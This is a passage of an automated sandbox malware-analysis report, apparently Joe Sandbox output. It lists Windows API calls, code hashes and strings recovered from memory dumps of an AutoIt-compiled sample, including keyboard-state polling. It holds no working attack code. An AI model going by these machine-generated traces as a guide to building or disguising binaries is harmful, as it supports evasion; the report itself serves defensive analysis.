                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          • API String ID: 1194449130-3405671355
                                          • Opcode ID: 37962d6b43f8d497f334fdc9166bc2d2c8c91439365c304e1dd457cce7ce76de
                                          • Instruction ID: 50383b64441cd30fd2acb7b934a69d40f0b0f2f4300b5879c8308d561687fc0c
                                          • Opcode Fuzzy Hash: 37962d6b43f8d497f334fdc9166bc2d2c8c91439365c304e1dd457cce7ce76de
                                          • Instruction Fuzzy Hash: 6A21D478248604EFE7455B61EC88A653B7BEB89785F001038F509819B1EF718DD0DA71
                                          APIs
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • CoInitialize.OLE32(00000000), ref: 0011DC2D
                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0011DCC0
                                          • SHGetDesktopFolder.SHELL32(?), ref: 0011DCD4
                                          • CoCreateInstance.OLE32(00143D4C,00000000,00000001,0016B86C,?), ref: 0011DD20
                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0011DD8F
                                          • CoTaskMemFree.OLE32(?,?), ref: 0011DDE7
                                          • _memset.LIBCMT ref: 0011DE24
                                          • SHBrowseForFolderW.SHELL32(?), ref: 0011DE60
                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0011DE83
                                          • CoTaskMemFree.OLE32(00000000), ref: 0011DE8A
                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0011DEC1
                                          • CoUninitialize.OLE32(00000001,00000000), ref: 0011DEC3
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                          • String ID:
                                          • API String ID: 1246142700-0
                                          • Opcode ID: 6cd664833a987df213df4e0a599c17821eceb938d96bde4e5a45820e4e638131
                                          • Instruction ID: 0939ef7a7b6d8f75942a00d81f5e8d957323812efe714933651168f3c1f79e7a
                                          • Opcode Fuzzy Hash: 6cd664833a987df213df4e0a599c17821eceb938d96bde4e5a45820e4e638131
                                          • Instruction Fuzzy Hash: 4CB1ED75A00119AFDB04DFA4D884DEEBBB9FF49305B148469F905EB261DB30EE85CB50
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00110896
                                          • SetKeyboardState.USER32(?), ref: 00110901
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00110921
                                          • GetKeyState.USER32(000000A0), ref: 00110938
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00110967
                                          • GetKeyState.USER32(000000A1), ref: 00110978
                                          • GetAsyncKeyState.USER32(00000011), ref: 001109A4
                                          • GetKeyState.USER32(00000011), ref: 001109B2
                                          • GetAsyncKeyState.USER32(00000012), ref: 001109DB
                                          • GetKeyState.USER32(00000012), ref: 001109E9
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00110A12
                                          • GetKeyState.USER32(0000005B), ref: 00110A20
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: b1915c1044ad64f4968eab320f402342beff363356a722271eaffa115f978d12
                                          • Instruction ID: 4278b68db7efd26f6c169cbfb54910e09f8be049262e888332c5d8ed6097073c
                                          • Opcode Fuzzy Hash: b1915c1044ad64f4968eab320f402342beff363356a722271eaffa115f978d12
                                          • Instruction Fuzzy Hash: 1C51CA20E0878829FB3ADBA048107EAFFB49F15384F0845AD95C65B5C3DBE49ACCC791
                                          APIs
                                          • GetDlgItem.USER32(?,00000001), ref: 0010CE1C
                                          • GetWindowRect.USER32(00000000,?), ref: 0010CE2E
                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0010CE8C
                                          • GetDlgItem.USER32(?,00000002), ref: 0010CE97
                                          • GetWindowRect.USER32(00000000,?), ref: 0010CEA9
                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0010CEFD
                                          • GetDlgItem.USER32(?,000003E9), ref: 0010CF0B
                                          • GetWindowRect.USER32(00000000,?), ref: 0010CF1C
                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0010CF5F
                                          • GetDlgItem.USER32(?,000003EA), ref: 0010CF6D
                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0010CF8A
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0010CF97
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$ItemMoveRect$Invalidate
                                          • String ID:
                                          • API String ID: 3096461208-0
                                          • Opcode ID: f5a5eeb8794f18a7eba37a18243e35388ccdf99e61e70b84ce17b76e22d46b17
                                          • Instruction ID: f702824854890cc069205ad5f06d5881e63ebb7187edb1855e90f9b81d9cbd7d
                                          • Opcode Fuzzy Hash: f5a5eeb8794f18a7eba37a18243e35388ccdf99e61e70b84ce17b76e22d46b17
                                          • Instruction Fuzzy Hash: 41516375B00205AFDF18CF69CD85AAEBBB6EB88711F14822DF616D72D0D7B0AD408B50
                                          APIs
                                            • Part of subcall function 000B1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000B2412,?,00000000,?,?,?,?,000B1AA7,00000000,?), ref: 000B1F76
                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000B24AF
                                          • KillTimer.USER32(-00000001,?,?,?,?,000B1AA7,00000000,?,?,000B1EBE,?,?), ref: 000B254A
                                          • DestroyAcceleratorTable.USER32(00000000), ref: 000EBFE7
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000B1AA7,00000000,?,?,000B1EBE,?,?), ref: 000EC018
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000B1AA7,00000000,?,?,000B1EBE,?,?), ref: 000EC02F
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000B1AA7,00000000,?,?,000B1EBE,?,?), ref: 000EC04B
                                          • DeleteObject.GDI32(00000000), ref: 000EC05D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 641708696-0
                                          • Opcode ID: 56cc02e27c0a1c93d278a17a8117eeac896515832d175886232b3f9ab81e0c8c
                                          • Instruction ID: 108d03090d7b09aee160b39e2689d4325bf157f29c646a91f96041aa62e48b12
                                          • Opcode Fuzzy Hash: 56cc02e27c0a1c93d278a17a8117eeac896515832d175886232b3f9ab81e0c8c
                                          • Instruction Fuzzy Hash: C1619831114640DFEB769F16D948BAABBF1FB44312F108528E48A6BEB0C771A8D1DF91
                                          APIs
                                            • Part of subcall function 000B29AB: GetWindowLongW.USER32(?,000000EB), ref: 000B29BC
                                          • GetSysColor.USER32(0000000F), ref: 000B25AF
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID:
                                          • API String ID: 259745315-0
                                          • Opcode ID: 0292cd5362de79a0a28acd59235fd4c725514828bd518e03f2453c7e6cb59611
                                          • Instruction ID: 2f5c6c77e7a211b3f2c88b35c25ad6a4a6358ba3ac91eff2f4a8a78ff91cb430
                                          • Opcode Fuzzy Hash: 0292cd5362de79a0a28acd59235fd4c725514828bd518e03f2453c7e6cb59611
                                          • Instruction Fuzzy Hash: EC41D231104540AFDB259F29DC88BF93BA5EB0A731F194265FE669A1F2C7318C82DB21
                                          APIs
                                            • Part of subcall function 000D0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,000C2A3E,?,00008000), ref: 000D0BA7
                                            • Part of subcall function 000D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C2A58,?,00008000), ref: 000D02A4
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000C2ADF
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 000C2C2C
                                            • Part of subcall function 000C3EBE: _wcscpy.LIBCMT ref: 000C3EF6
                                            • Part of subcall function 000D386D: _iswctype.LIBCMT ref: 000D3875
                                           Memory Dump Source
                                           • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                          • API String ID: 537147316-3738523708
                                          • Opcode ID: ae4568904f564736a6db40f43a002254aa5f352841f2ded8a94644c5a9315f07
                                          • Instruction ID: 0ca6133a2877586065fd095b16290636680b1db55fa7544c6db902c2b380067f
                                          • Opcode Fuzzy Hash: ae4568904f564736a6db40f43a002254aa5f352841f2ded8a94644c5a9315f07
                                          • Instruction Fuzzy Hash: 2502BF311083419FC724EF24C891EEFBBE5AF99354F00492DF59A932A2DB70DA49CB52
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,00140980), ref: 0011AF4E
                                          • GetDriveTypeW.KERNEL32(00000061,0016B5F0,00000061), ref: 0011B018
                                          • _wcscpy.LIBCMT ref: 0011B042
                                           Memory Dump Source
                                           • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharDriveLowerType_wcscpy
                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                          • API String ID: 2820617543-1000479233
                                          • Opcode ID: f090e5583b60429fed84ebe370edcb5ef7b3b230483e2ddb104eda600e6b2437
                                          • Instruction ID: cdca5588e22fe85c1c16cefab2de57823a2bca6b353cd00683b3d93c2a1c6341
                                          • Opcode Fuzzy Hash: f090e5583b60429fed84ebe370edcb5ef7b3b230483e2ddb104eda600e6b2437
                                          • Instruction Fuzzy Hash: 2451B1711083059BC318EF14C8D1AEEB7A5EF95700F50482EF496972A3DB31DE8ACA53
                                           Memory Dump Source
                                           • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __i64tow__itow__swprintf
                                          • String ID: %.15g$0x%p$False$True
                                          • API String ID: 421087845-2263619337
                                          • Opcode ID: 159fc848ca8352e4faf0c6bf1fcc67cb02a2793afdf644c783b80cf4aa9740e5
                                          • Instruction ID: e63bf063af34244b38f5c124c8c6119c90474fae785cba1eb3948d61ed3d6bf5
                                          • Opcode Fuzzy Hash: 159fc848ca8352e4faf0c6bf1fcc67cb02a2793afdf644c783b80cf4aa9740e5
                                          • Instruction Fuzzy Hash: 3C419271608209AFDB34DF64D842EBA73E8EB45300F24446FF549D73A3EA719A418B21
                                          APIs
                                          • _memset.LIBCMT ref: 0013778F
                                          • CreateMenu.USER32 ref: 001377AA
                                          • SetMenu.USER32(?,00000000), ref: 001377B9
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00137846
                                          • IsMenu.USER32(?), ref: 0013785C
                                          • CreatePopupMenu.USER32 ref: 00137866
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00137893
                                          • DrawMenuBar.USER32 ref: 0013789B
                                           Memory Dump Source
                                           • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                          • String ID: 0$F
                                          • API String ID: 176399719-3044882817
                                          • Opcode ID: 5d4c5114ffd24da3102d9b9f1ec1b5d461d92a177dfdfa1b7b4b5ae1036ab640
                                          • Instruction ID: 3319b1fa6f88e70d5a33215937ebc3fb320bbaebc32ec5bfa412229853d02475
                                          • Opcode Fuzzy Hash: 5d4c5114ffd24da3102d9b9f1ec1b5d461d92a177dfdfa1b7b4b5ae1036ab640
                                          • Instruction Fuzzy Hash: F8414CB8A04209EFEB20DF65D888E9A7BF5FF49310F144469FA49A73A0D731A950DF50
                                          APIs
                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00137B83
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00137B8A
                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00137B9D
                                          • SelectObject.GDI32(00000000,00000000), ref: 00137BA5
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00137BB0
                                          • DeleteDC.GDI32(00000000), ref: 00137BB9
                                          • GetWindowLongW.USER32(?,000000EC), ref: 00137BC3
                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00137BD7
                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00137BE3
                                           Memory Dump Source
                                           • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                          • String ID: static
                                          • API String ID: 2559357485-2160076837
                                          • Opcode ID: 3df07a0b669e2e521a6dba5de2ef32e799d2eb47b4770025fe7e4d526432b035
                                          • Instruction ID: 841e77c9a77961e868fe8391b51111d00fca45dbd0bc4b3bac34e41baeff7b1b
                                          • Opcode Fuzzy Hash: 3df07a0b669e2e521a6dba5de2ef32e799d2eb47b4770025fe7e4d526432b035
                                          • Instruction Fuzzy Hash: 6F318A76104218ABDF229FA5DC49FDB7B69FF0E760F110214FA59A61E0C731D860DBA0
                                          APIs
                                          • _memset.LIBCMT ref: 000D706B
                                            • Part of subcall function 000D8D58: __getptd_noexit.LIBCMT ref: 000D8D58
                                          • __gmtime64_s.LIBCMT ref: 000D7104
                                          • __gmtime64_s.LIBCMT ref: 000D713A
                                          • __gmtime64_s.LIBCMT ref: 000D7157
                                          • __allrem.LIBCMT ref: 000D71AD
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D71C9
                                          • __allrem.LIBCMT ref: 000D71E0
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D71FE
                                          • __allrem.LIBCMT ref: 000D7215
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D7233
                                          • __invoke_watson.LIBCMT ref: 000D72A4
                                           Memory Dump Source
                                           • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                          • String ID:
                                          • API String ID: 384356119-0
                                          • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                          • Instruction ID: b796e9befe9712c8488f0d20183929404873ba5fd8c1c014f5a0f2fb3aa0be75
                                          • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                          • Instruction Fuzzy Hash: 4571D671A04756ABD7149E79CC82BAAB7E9AF54324F14423BF518E73C2F770D9408BA0
                                          APIs
                                          • _memset.LIBCMT ref: 00112CE9
                                          • GetMenuItemInfoW.USER32(00177890,000000FF,00000000,00000030), ref: 00112D4A
                                          • SetMenuItemInfoW.USER32(00177890,00000004,00000000,00000030), ref: 00112D80
                                          • Sleep.KERNEL32(000001F4), ref: 00112D92
                                          • GetMenuItemCount.USER32(?), ref: 00112DD6
                                          • GetMenuItemID.USER32(?,00000000), ref: 00112DF2
                                          • GetMenuItemID.USER32(?,-00000001), ref: 00112E1C
                                          • GetMenuItemID.USER32(?,?), ref: 00112E61
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00112EA7
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00112EBB
                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00112EDC
                                           Memory Dump Source
                                           • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                          • String ID:
                                          • API String ID: 4176008265-0
                                          • Opcode ID: 8816d6c1d8306f00ee870572465910d3d5b17972e2bf5866cf3abb0bbd9ed3fe
                                          • Instruction ID: dd5083b16990e2ac13fdb30ef8c69c759dde4033edfae03d0058fd65098ea969
                                          • Opcode Fuzzy Hash: 8816d6c1d8306f00ee870572465910d3d5b17972e2bf5866cf3abb0bbd9ed3fe
                                          • Instruction Fuzzy Hash: E561C070901249AFDF19DFA4DC88AFEBBB9EB05304F144069F851A7291D731ADE6CB21
                                          APIs
                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001375CA
                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001375CD
                                          • GetWindowLongW.USER32(?,000000F0), ref: 001375F1
                                          • _memset.LIBCMT ref: 00137602
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00137614
                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0013768C
                                           Memory Dump Source
                                           • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow_memset
                                          • String ID:
                                          • API String ID: 830647256-0
                                          • Opcode ID: a430c44bc87c8db1292f6e2eb44b91e40006e3526950948de7f59c026f1abf38
                                          • Instruction ID: 54768d361fc464411909c3491d033816d2945c3753285a9ca0d27c4aa762901a
                                          • Opcode Fuzzy Hash: a430c44bc87c8db1292f6e2eb44b91e40006e3526950948de7f59c026f1abf38
                                          • Instruction Fuzzy Hash: 26618CB5904208AFDB21DFA4CC85EEE77F8EB09710F144199FA15A72E1D770AD81DB60
                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001077DD
                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00107836
                                          • VariantInit.OLEAUT32(?), ref: 00107848
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00107868
                                          • VariantCopy.OLEAUT32(?,?), ref: 001078BB
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 001078CF
                                          • VariantClear.OLEAUT32(?), ref: 001078E4
                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 001078F1
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001078FA
                                          • VariantClear.OLEAUT32(?), ref: 0010790C
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00107917
                                           Memory Dump Source
                                           • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
                                          • API String ID: 2706829360-0
                                          • Opcode ID: 26320f0fc6564ffb86e399f5261b8a1e51376bc3ac9071cda4d0cb535f7de2a4
                                          • Instruction ID: 522a2fc0e57c35ad31f4ace92df2a53efe1e395a0005315348f2af3d3a900204
                                          • Opcode Fuzzy Hash: 26320f0fc6564ffb86e399f5261b8a1e51376bc3ac9071cda4d0cb535f7de2a4
